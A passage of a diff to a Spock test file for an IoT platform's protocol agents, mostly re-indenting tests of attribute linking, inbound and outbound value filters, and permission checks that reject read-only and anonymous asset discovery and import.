-            assert !mockThing.getAttribute("filterRegex").get().getValue().isPresent()
-        }
-
-        when: "a sensor value is received that links to an attribute using a mathExpression filter"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterMath"), "100", null)
-
-        then: "the linked attributes value should be updated with the calculated result"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true) as ThingAsset
-            assert mockThing.getAttribute("filterMath").get().getValue(Double.class).orElse(0d) == 60
-        }
-
-        when: "the same attribute receives a sensor value that doesn't match the filter"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterMath"), "s100", null)
-
-        then: "the linked attributes value should be skipped"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true)
-            assert mockThing.getAttribute("filterMath").get().getValue().isEmpty()
-        }
-
-
-        when: "a sensor value is received that links to an attribute using a substring filter"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterSubstring"), "Substring test value", null)
-
-        then: "the linked attributes value should be updated with the filtered result"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true)
-            assert mockThing.getAttribute("filterSubstring").get().getValue().orElse(null) == "te"
-        }
-
-        when: "the same attribute receives a sensor value that doesn't match the substring filter"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterSubstring"), "Substring", null)
-
-        then: "the linked attributes value should be updated to null"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true)
-            assert !mockThing.getAttribute("filterSubstring").get().getValue().isPresent()
-        }
-
-        when: "a sensor value is received that links to an attribute using a regex and substring filter"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterRegexSubstring"), '{"prop1":true,"prop2":"volume is at 90%"}', null)
-
-        then: "the linked attributes value should be updated with the filtered result"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true)
-            assert mockThing.getAttribute("filterRegexSubstring").get().getValue().orElse(0d) == 90d
-        }
-
-        when: "the same attribute receives a sensor value that doesn't match the substring filter"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterRegexSubstring"), '"volume is at 90%"}', null)
-
-        then: "the linked attributes value should be updated to null"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true)
-            assert !mockThing.getAttribute("filterRegexSubstring").get().getValue().isPresent()
-        }
-
-        when: "a sensor value is received on the read/write math attribute (inbound: x*10)"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "readWriteMath"), 25, null)
-
-        then: "the inbound value filter should multiply by 10"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true) as ThingAsset
-            assert mockThing.getAttribute("readWriteMath").get().getValue(Double.class).orElse(0d) == 250d
-        }
-
-        when: "the same attribute is written to by the user (outbound: x/10)"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.clear()
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteProcessedValues.clear()
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateSensor = false
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(mockThing.id, "readWriteMath", 250d))
-
-        then: "the outbound write value filter should divide by 10 before reaching the protocol"
-        conditions.eventually {
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.size() == 1
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.get(0).name == "readWriteMath"
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteProcessedValues.get(0) == 25.0d
-        }
-
-        when: "a sensor value is received on the read/write regex attribute (inbound: extract number from temp=N)"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateSensor = true
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "readWriteRegex"), "temp=42", null)
-
-        then: "the inbound value filter should extract the number"
-        conditions.eventually {
-            mockThing = assetStorageService.find(mockThing.id, true) as ThingAsset
-            assert mockThing.getAttribute("readWriteRegex").get().getValue(Double.class).orElse(0d) == 42d
-        }
-
-        when: "the same attribute is written with a non-numeric value (outbound regex won't match)"
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.clear()
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteProcessedValues.clear()
-        ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateSensor = false
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(mockThing.id, "readWriteRegex", "not a number"))
-
-        then: "the write should be suppressed because the outbound filter produced null"
-        new PollingConditions(timeout: 3, initialDelay: 1).eventually {
-            assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.size() == 0
-        }
+    then: "the mock thing to be fully deployed in the correct order"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(mockAgent1.id) != null
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.size() == 10
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(0) == "START"
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(1).startsWith("LINK_ATTRIBUTE")
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(2).startsWith("LINK_ATTRIBUTE")
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(3).startsWith("LINK_ATTRIBUTE")
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(4).startsWith("LINK_ATTRIBUTE")
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(5).startsWith("LINK_ATTRIBUTE")
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(6).startsWith("LINK_ATTRIBUTE")
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(7).startsWith("LINK_ATTRIBUTE")
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(8).startsWith("LINK_ATTRIBUTE")
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.get(9).startsWith("LINK_ATTRIBUTE")
+      assert agentService.getProtocolInstance(mockAgent1.id).linkedAttributes.size() == protocolExpectedLinkedAttributeCount["mockAgent1"]
     }
 
-    def "Protocol asset discovery requires asset write permission"() {
+    and: "invalid attribute should not actually have been linked"
+    assert !((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).linkedAttributes.any {
+      it.value.name == "invalidToggle1"
+    }
 
-        given: "the server container is started"
-        def conditions = new PollingConditions(timeout: 10, initialDelay: 0.3, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
-        MockAgent agent = null
+    when: "values are sent to the linked attributes by the protocol"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "lightToggle1"), true, null)
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "tempTarget1"), 25.5d, null)
 
-        and: "a master realm user with read-only asset permission"
-        def username = "agentdiscoveryreadonly-${UUID.randomUUID()}"
-        keycloakTestSetup.createUser(
+    then: "the linked attributes values should have been updated by the protocol"
+    conditions.eventually {
+      def mockAsset = assetStorageService.find(mockThing.id, true)
+      // Check all valid linked attributes have the new values
+      assert mockAsset.getAttribute("lightToggle1").flatMap{it.getValue()}.orElse(false)
+      assert mockAsset.getAttribute("tempTarget1").flatMap{it.getValue()}.orElse(0d) == 25.5d
+      // Check invalid attributes don't have the new values
+      assert !mockAsset.getAttribute("lightToggle2").get().getValue().isPresent()
+      assert !mockAsset.getAttribute("tempTarget2").get().getValue().isPresent()
+      assert !mockAsset.getAttribute("lightToggle3").get().getValue().isPresent()
+      assert !mockAsset.getAttribute("tempTarget3").get().getValue().isPresent()
+    }
+
+    when: "the disabled agent is enabled"
+    mockAgent2.setDisabled(false)
+    mockAgent2 = assetStorageService.merge(mockAgent2)
+
+    then: "a protocol instance should exist and attributes should be linked"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(mockAgent2.id) != null
+      assert agentService.getProtocolInstance(mockAgent2.id).linkedAttributes.size() == protocolExpectedLinkedAttributeCount["mockAgent2"]
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent2.id)).protocolMethodCalls.size() == 3
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent2.id)).protocolMethodCalls.get(0) == "START"
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent2.id)).protocolMethodCalls.get(1).startsWith("LINK_ATTRIBUTE")
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent2.id)).protocolMethodCalls.get(2).startsWith("LINK_ATTRIBUTE")
+    }
+
+    when: "a linked attribute is removed"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.clear()
+    mockThing = assetStorageService.find(mockThing.id, true)
+    mockThing.getAttributes().remove("lightToggle1")
+    mockThing = assetStorageService.merge(mockThing)
+
+    then: "the protocol should not be stopped but the attribute should be unlinked"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(mockAgent1.id).linkedAttributes.size() == protocolExpectedLinkedAttributeCount["mockAgent1"] - 1
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.size() == 1
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolMethodCalls.any {
+        it == "UNLINK_ATTRIBUTE:${mockThing.id}:lightToggle1"
+      }
+      assert !((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).linkedAttributes.containsKey(new AttributeRef(mockThing.id, "invalidToggle1"))
+    }
+
+    when: "an agent is removed"
+    def mockProtocol2 = (MockProtocol)agentService.getProtocolInstance(mockAgent2.id)
+    mockProtocol2.protocolMethodCalls.clear()
+    assetStorageService.delete([mockAgent2.id])
+
+    then: "the attributes should be unlinked then the protocol stopped"
+    conditions.eventually {
+      assert mockProtocol2.protocolMethodCalls.size() == 3
+      assert mockProtocol2.protocolMethodCalls.get(0).startsWith("UNLINK_ATTRIBUTE")
+      assert mockProtocol2.protocolMethodCalls.get(1).startsWith("UNLINK_ATTRIBUTE")
+      assert mockProtocol2.protocolMethodCalls.get(2) == "STOP"
+    }
+
+    and: "the protocol instance and agent should be removed"
+    conditions.eventually {
+      assert agentService.getProtocolInstance(mockAgent2.id) == null
+    }
+
+    when: "the mock protocol tries to update the plain readonly attribute"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateAttribute(new AttributeState(mockThing.id,"plainAttribute", "UPDATE"))
+
+    then: "the plain attributes value should be updated"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true)
+      assert mockThing.getAttribute("plainAttribute").get().getValue().orElse("") == "UPDATE"
+    }
+
+    when: "a target temp linked attribute value is updated it should reach the protocol"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(mockThing.id, "tempTarget1", 30d))
+
+    then: "the update should reach the protocol as an attribute write request"
+    conditions.eventually {
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.size() == 1
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.get(0).name == "tempTarget1"
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.get(0).ref.id == mockThing.id
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.get(0).value.orElse(null) == 30d
+    }
+
+    then: "the target temp attributes value should be updated"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true) as ThingAsset
+      assert mockThing.getAttribute("tempTarget1").get().getValue(Double.class).orElse(0d) == 30d
+    }
+
+    when: "a sensor value is received that links to an attribute using a regex filter"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterRegex"), "s100 d56 g1212", null)
+
+    then: "the linked attributes value should be updated with the filtered result"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true) as ThingAsset
+      assert mockThing.getAttribute("filterRegex").get().getValue(Double.class).orElse(0d) == 1212d
+    }
+
+    when: "the same attribute receives a sensor value that doesn't match the regex filter (match index invalid)"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterRegex"), "s100", null)
+
+    then: "the linked attributes value should be updated to null"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true)
+      assert !mockThing.getAttribute("filterRegex").get().getValue().isPresent()
+    }
+
+    when: "the same attribute receives a sensor value that doesn't match the regex filter (no match)"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterRegex"), "no match to be found!", null)
+
+    then: "the linked attributes value should be updated to null"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true)
+      assert !mockThing.getAttribute("filterRegex").get().getValue().isPresent()
+    }
+
+    when: "a sensor value is received that links to an attribute using a mathExpression filter"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterMath"), "100", null)
+
+    then: "the linked attributes value should be updated with the calculated result"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true) as ThingAsset
+      assert mockThing.getAttribute("filterMath").get().getValue(Double.class).orElse(0d) == 60
+    }
+
+    when: "the same attribute receives a sensor value that doesn't match the filter"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterMath"), "s100", null)
+
+    then: "the linked attributes value should be skipped"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true)
+      assert mockThing.getAttribute("filterMath").get().getValue().isEmpty()
+    }
+
+
+    when: "a sensor value is received that links to an attribute using a substring filter"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterSubstring"), "Substring test value", null)
+
+    then: "the linked attributes value should be updated with the filtered result"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true)
+      assert mockThing.getAttribute("filterSubstring").get().getValue().orElse(null) == "te"
+    }
+
+    when: "the same attribute receives a sensor value that doesn't match the substring filter"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterSubstring"), "Substring", null)
+
+    then: "the linked attributes value should be updated to null"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true)
+      assert !mockThing.getAttribute("filterSubstring").get().getValue().isPresent()
+    }
+
+    when: "a sensor value is received that links to an attribute using a regex and substring filter"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterRegexSubstring"), '{"prop1":true,"prop2":"volume is at 90%"}', null)
+
+    then: "the linked attributes value should be updated with the filtered result"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true)
+      assert mockThing.getAttribute("filterRegexSubstring").get().getValue().orElse(0d) == 90d
+    }
+
+    when: "the same attribute receives a sensor value that doesn't match the substring filter"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "filterRegexSubstring"), '"volume is at 90%"}', null)
+
+    then: "the linked attributes value should be updated to null"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true)
+      assert !mockThing.getAttribute("filterRegexSubstring").get().getValue().isPresent()
+    }
+
+    when: "a sensor value is received on the read/write math attribute (inbound: x*10)"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "readWriteMath"), 25, null)
+
+    then: "the inbound value filter should multiply by 10"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true) as ThingAsset
+      assert mockThing.getAttribute("readWriteMath").get().getValue(Double.class).orElse(0d) == 250d
+    }
+
+    when: "the same attribute is written to by the user (outbound: x/10)"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.clear()
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteProcessedValues.clear()
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateSensor = false
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(mockThing.id, "readWriteMath", 250d))
+
+    then: "the outbound write value filter should divide by 10 before reaching the protocol"
+    conditions.eventually {
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.size() == 1
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.get(0).name == "readWriteMath"
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteProcessedValues.get(0) == 25.0d
+    }
+
+    when: "a sensor value is received on the read/write regex attribute (inbound: extract number from temp=N)"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateSensor = true
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateReceived(new AttributeRef(mockThing.id, "readWriteRegex"), "temp=42", null)
+
+    then: "the inbound value filter should extract the number"
+    conditions.eventually {
+      mockThing = assetStorageService.find(mockThing.id, true) as ThingAsset
+      assert mockThing.getAttribute("readWriteRegex").get().getValue(Double.class).orElse(0d) == 42d
+    }
+
+    when: "the same attribute is written with a non-numeric value (outbound regex won't match)"
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.clear()
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteProcessedValues.clear()
+    ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).updateSensor = false
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(mockThing.id, "readWriteRegex", "not a number"))
+
+    then: "the write should be suppressed because the outbound filter produced null"
+    new PollingConditions(timeout: 3, initialDelay: 1).eventually {
+      assert ((MockProtocol)agentService.getProtocolInstance(mockAgent1.id)).protocolWriteAttributeEvents.size() == 0
+    }
+  }
+
+  def "Protocol asset discovery requires asset write permission"() {
+
+    given: "the server container is started"
+    def conditions = new PollingConditions(timeout: 10, initialDelay: 0.3, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+    MockAgent agent = null
+
+    and: "a master realm user with read-only asset permission"
+    def username = "agentdiscoveryreadonly-${UUID.randomUUID()}"
+    keycloakTestSetup.createUser(
             MASTER_REALM,
             username,
             username,
@@ -525,54 +527,54 @@ class BasicProtocolTest extends Specification implements ManagerContainerTrait {
             "${username}@openremote.local",
             true,
             [ClientRole.READ_ASSETS] as ClientRole[]
-        )
-        def accessToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, username, username)
+            )
+    def accessToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, username, username)
 
-        and: "a running mock protocol agent"
-        agent = new MockAgent("Mock discovery agent")
+    and: "a running mock protocol agent"
+    agent = new MockAgent("Mock discovery agent")
             .setRealm(MASTER_REALM)
             .setRequired(true)
-        agent = assetStorageService.merge(agent)
+    agent = assetStorageService.merge(agent)
 
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) instanceof MockProtocol
-        }
-
-        and: "the agent resource"
-        def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
-
-        when: "the read-only user discovers assets through the agent endpoint"
-        agentResource.doProtocolAssetDiscovery(null, agent.id, MASTER_REALM)
-
-        then: "asset discovery should require write permission"
-        ForbiddenException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        and: "no discovered assets should be persisted"
-        conditions.eventually {
-            assert assetStorageService.findAll(new AssetQuery().parents(agent.id).recursive(true)).isEmpty()
-        }
-
-        cleanup: "remove agent and any discovered assets"
-        deleteAgentTree(assetStorageService, agent)
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) instanceof MockProtocol
     }
 
-    def "Protocol asset discovery allows asset write permission"() {
+    and: "the agent resource"
+    def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
 
-        given: "the server container is started"
-        def conditions = new PollingConditions(timeout: 10, initialDelay: 0.3, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
-        MockAgent agent = null
+    when: "the read-only user discovers assets through the agent endpoint"
+    agentResource.doProtocolAssetDiscovery(null, agent.id, MASTER_REALM)
 
-        and: "a master realm user with asset write permission"
-        def username = "agentdiscoverywriter-${UUID.randomUUID()}"
-        keycloakTestSetup.createUser(
+    then: "asset discovery should require write permission"
+    ForbiddenException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    and: "no discovered assets should be persisted"
+    conditions.eventually {
+      assert assetStorageService.findAll(new AssetQuery().parents(agent.id).recursive(true)).isEmpty()
+    }
+
+    cleanup: "remove agent and any discovered assets"
+    deleteAgentTree(assetStorageService, agent)
+  }
+
+  def "Protocol asset discovery allows asset write permission"() {
+
+    given: "the server container is started"
+    def conditions = new PollingConditions(timeout: 10, initialDelay: 0.3, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+    MockAgent agent = null
+
+    and: "a master realm user with asset write permission"
+    def username = "agentdiscoverywriter-${UUID.randomUUID()}"
+    keycloakTestSetup.createUser(
             MASTER_REALM,
             username,
             username,
@@ -581,115 +583,115 @@ class BasicProtocolTest extends Specification implements ManagerContainerTrait {
             "${username}@openremote.local",
             true,
             [ClientRole.WRITE_ASSETS] as ClientRole[]
-        )
-        def accessToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, username, username)
+            )
+    def accessToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, username, username)
 
-        and: "a running mock protocol agent"
-        agent = new MockAgent("Mock discovery writer agent")
+    and: "a running mock protocol agent"
+    agent = new MockAgent("Mock discovery writer agent")
             .setRealm(MASTER_REALM)
             .setRequired(true)
-        agent = assetStorageService.merge(agent)
+    agent = assetStorageService.merge(agent)
 
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) instanceof MockProtocol
-        }
-
-        and: "the agent resource"
-        def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
-
-        when: "the writer user discovers assets through the agent endpoint"
-        def assets = agentResource.doProtocolAssetDiscovery(null, agent.id, MASTER_REALM)
-
-        then: "discovered assets should be returned and persisted"
-        assert assets.length == 4
-        conditions.eventually {
-            assert assetStorageService.findAll(new AssetQuery().parents(agent.id).recursive(true)).size() == 4
-        }
-
-        cleanup: "remove agent and discovered assets"
-        deleteAgentTree(assetStorageService, agent)
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) instanceof MockProtocol
     }
 
-    def "Anonymous users cannot run protocol asset import"() {
+    and: "the agent resource"
+    def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AgentResource.class)
 
-        given: "the server container is started"
-        def conditions = new PollingConditions(timeout: 10, initialDelay: 0.3, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
-        MockAgent agent = null
+    when: "the writer user discovers assets through the agent endpoint"
+    def assets = agentResource.doProtocolAssetDiscovery(null, agent.id, MASTER_REALM)
 
-        and: "a running mock protocol agent"
-        agent = new MockAgent("Mock import auth agent")
+    then: "discovered assets should be returned and persisted"
+    assert assets.length == 4
+    conditions.eventually {
+      assert assetStorageService.findAll(new AssetQuery().parents(agent.id).recursive(true)).size() == 4
+    }
+
+    cleanup: "remove agent and discovered assets"
+    deleteAgentTree(assetStorageService, agent)
+  }
+
+  def "Anonymous users cannot run protocol asset import"() {
+
+    given: "the server container is started"
+    def conditions = new PollingConditions(timeout: 10, initialDelay: 0.3, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+    MockAgent agent = null
+
+    and: "a running mock protocol agent"
+    agent = new MockAgent("Mock import auth agent")
             .setRealm(MASTER_REALM)
             .setRequired(true)
-        agent = assetStorageService.merge(agent)
+    agent = assetStorageService.merge(agent)
 
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) instanceof MockProtocol
-        }
-
-        and: "an anonymous agent resource"
-        def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM).proxy(AgentResource.class)
-
-        when: "an anonymous user imports assets through the agent endpoint"
-        agentResource.doProtocolAssetImport(null, agent.id, MASTER_REALM, new FileInfo("mock.txt", "ignored", false))
-
-        then: "anonymous asset import should be rejected"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        cleanup: "remove agent and any imported assets"
-        deleteAgentTree(assetStorageService, agent)
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) instanceof MockProtocol
     }
 
-    def "Anonymous users cannot run protocol asset discovery"() {
+    and: "an anonymous agent resource"
+    def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM).proxy(AgentResource.class)
 
-        given: "the server container is started"
-        def conditions = new PollingConditions(timeout: 10, initialDelay: 0.3, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def agentService = container.getService(AgentService.class)
-        MockAgent agent = null
+    when: "an anonymous user imports assets through the agent endpoint"
+    agentResource.doProtocolAssetImport(null, agent.id, MASTER_REALM, new FileInfo("mock.txt", "ignored", false))
 
-        and: "a running mock protocol agent"
-        agent = new MockAgent("Mock discovery auth agent")
+    then: "anonymous asset import should be rejected"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    cleanup: "remove agent and any imported assets"
+    deleteAgentTree(assetStorageService, agent)
+  }
+
+  def "Anonymous users cannot run protocol asset discovery"() {
+
+    given: "the server container is started"
+    def conditions = new PollingConditions(timeout: 10, initialDelay: 0.3, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def agentService = container.getService(AgentService.class)
+    MockAgent agent = null
+
+    and: "a running mock protocol agent"
+    agent = new MockAgent("Mock discovery auth agent")
             .setRealm(MASTER_REALM)
             .setRequired(true)
-        agent = assetStorageService.merge(agent)
+    agent = assetStorageService.merge(agent)
 
-        conditions.eventually {
-            assert agentService.getProtocolInstance(agent.id) instanceof MockProtocol
-        }
-
-        and: "an anonymous agent resource"
-        def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM).proxy(AgentResource.class)
-
-        when: "an anonymous user discovers assets through the agent endpoint"
-        agentResource.doProtocolAssetDiscovery(null, agent.id, MASTER_REALM)
-
-        then: "anonymous asset discovery should be rejected"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        cleanup: "remove agent and any discovered assets"
-        deleteAgentTree(assetStorageService, agent)
+    conditions.eventually {
+      assert agentService.getProtocolInstance(agent.id) instanceof MockProtocol
     }
 
-    private void deleteAgentTree(AssetStorageService assetStorageService, MockAgent agent) {
-        if (assetStorageService == null || agent == null) {
-            return
-        }
+    and: "an anonymous agent resource"
+    def agentResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM).proxy(AgentResource.class)
 
-        def assetIds = assetStorageService.findAll(new AssetQuery().parents(agent.id).recursive(true))
+    when: "an anonymous user discovers assets through the agent endpoint"
+    agentResource.doProtocolAssetDiscovery(null, agent.id, MASTER_REALM)
+
+    then: "anonymous asset discovery should be rejected"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    cleanup: "remove agent and any discovered assets"
+    deleteAgentTree(assetStorageService, agent)
+  }
+
+  private void deleteAgentTree(AssetStorageService assetStorageService, MockAgent agent) {
+    if (assetStorageService == null || agent == null) {
+      return
+    }
+
+    def assetIds = assetStorageService.findAll(new AssetQuery().parents(agent.id).recursive(true))
             .collect { it.id }
-        assetIds.add(agent.id)
-        assetStorageService.delete(assetIds, true)
-    }
+    assetIds.add(agent.id)
+    assetStorageService.delete(assetIds, true)
+  }
 }

